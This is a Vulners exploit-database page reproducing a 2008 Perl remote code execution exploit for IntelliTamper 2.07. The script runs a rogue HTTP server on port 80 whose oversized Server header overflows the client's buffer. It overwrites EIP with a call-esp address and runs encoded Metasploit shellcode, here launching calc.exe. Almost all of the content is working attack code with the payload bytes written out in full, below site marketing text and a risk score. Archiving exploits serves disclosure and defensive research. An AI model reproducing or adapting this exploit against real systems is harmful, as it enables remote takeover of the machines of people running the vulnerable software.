Vulners
Lucene search
IntelliTamper 2.07 (server header) Remote Code Execution Exploit
#!/usr/bin/perl
#
# IntelliTamper 2.07 Remote Code Execution ( server header )
#
# By: Koshi
#
# Guido Landi finally did it, thought i'd throw one in there.
# This example assumes you're scanning "http://127.0.0.1"
# For example, exploit may not work if you were to scan "http://127.0.0.1:80"
# or even changing it as slightly as "http://127.0.0.1/"
#
# gr33tz: Rima my baby, str0ke, messiah, Idol, old venny ;) , BU,
# and finally, Guido Landi for sparking my interest in exploiting
# this application.
#
#
use IO::Socket;
my $msg="";
my $overflow = "A"x1536;
my $fun = "".
"\xb3\x8d\x95\x7c". # EIP (0x7C958DB3 call esp NTDLL.DLL)
"z3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0C". # More buffer.
"AAAA2Cb3Cb4CBBBB"; # Starts executing here
# win32_exec - EXITFUNC=seh CMD=calc.exe Size=338 Encoder=Alpha2 http://metasploit.com
my $sh3llcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x51\x5a\x6a\x63".
"\x58\x30\x42\x31\x50\x42\x41\x6b\x41\x41\x73\x41\x32\x41\x41\x32".
"\x42\x41\x30\x42\x41\x58\x38\x41\x42\x50\x75\x4b\x59\x59\x6c\x6a".
"\x48\x70\x44\x35\x50\x65\x50\x73\x30\x6e\x6b\x33\x75\x75\x6c\x4c".
"\x4b\x71\x6c\x53\x35\x74\x38\x55\x51\x78\x6f\x6e\x6b\x62\x6f\x36".
"\x78\x6c\x4b\x53\x6f\x65\x70\x36\x61\x6a\x4b\x43\x79\x6e\x6b\x76".
"\x54\x4e\x6b\x53\x31\x68\x6e\x64\x71\x6f\x30\x5a\x39\x4e\x4c\x6e".
"\x64\x6f\x30\x71\x64\x75\x57\x78\x41\x38\x4a\x74\x4d\x76\x61\x4f".
"\x32\x5a\x4b\x39\x64\x75\x6b\x43\x64\x67\x54\x74\x44\x74\x35\x48".
"\x65\x6c\x4b\x73\x6f\x37\x54\x57\x71\x38\x6b\x70\x66\x6e\x6b\x64".
"\x4c\x70\x4b\x4e\x6b\x33\x6f\x35\x4c\x64\x41\x38\x6b\x4c\x4b\x37".
"\x6c\x4c\x4b\x76\x61\x58\x6b\x6c\x49\x43\x6c\x55\x74\x56\x64\x4f".
"\x33\x44\x71\x4f\x30\x30\x64\x6c\x4b\x77\x30\x74\x70\x6f\x75\x49".
"\x50\x50\x78\x36\x6c\x4c\x4b\x33\x70\x54\x4c\x6e\x6b\x30\x70\x45".
"\x4c\x6e\x4d\x4c\x4b\x55\x38\x43\x38\x78\x6b\x44\x49\x6e\x6b\x4b".
"\x30\x6c\x70\x45\x50\x65\x50\x75\x50\x4c\x4b\x41\x78\x75\x6c\x51".
"\x4f\x30\x31\x7a\x56\x51\x70\x30\x56\x4f\x79\x38\x78\x6c\x43\x6b".
"\x70\x71\x6b\x72\x70\x61\x78\x4a\x50\x4d\x5a\x43\x34\x43\x6f\x43".
"\x58\x4c\x58\x49\x6e\x6c\x4a\x66\x6e\x43\x67\x69\x6f\x48\x67\x43".
"\x53\x73\x51\x50\x6c\x41\x73\x66\x4e\x70\x65\x72\x58\x71\x75\x37".
"\x70\x63";
my $overflow2 = "A"x1046;
my $buff = "$overflow$fun$sh3llcode";
my $resp = "".
"HTTP/1.1 200 OK\r\n".
"Connection: close\r\n".
"Content-Length: 8\r\n".
"Date: Mon, 21 Jul 2008 20:47:05 GMT\r\n".
"Content-Type: text/plain\r\n".
"Server: $buff\r\n".
"MIME-Version: 1.0\r\n\r\n".
"Exploit!\r\n";
my $sock = new IO::Socket::INET (LocalPort => '80', Proto => 'tcp', Listen => 1, Reuse => 1, );
print "Listening on port 80 for connections...\n";
my $new_sock = $sock->accept();
print "Got connection from client...\n";
my $sock_addr = recv($new_sock,$msg,190,0);
print "Sending client packet...\n";
print $new_sock "$resp";
print "Packet sent to client, voila?\n";
close($sock);
print "Socket closed\n";
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
23 Jul 2008 00:00Current
7.1High risk
Vulners AI Score7.1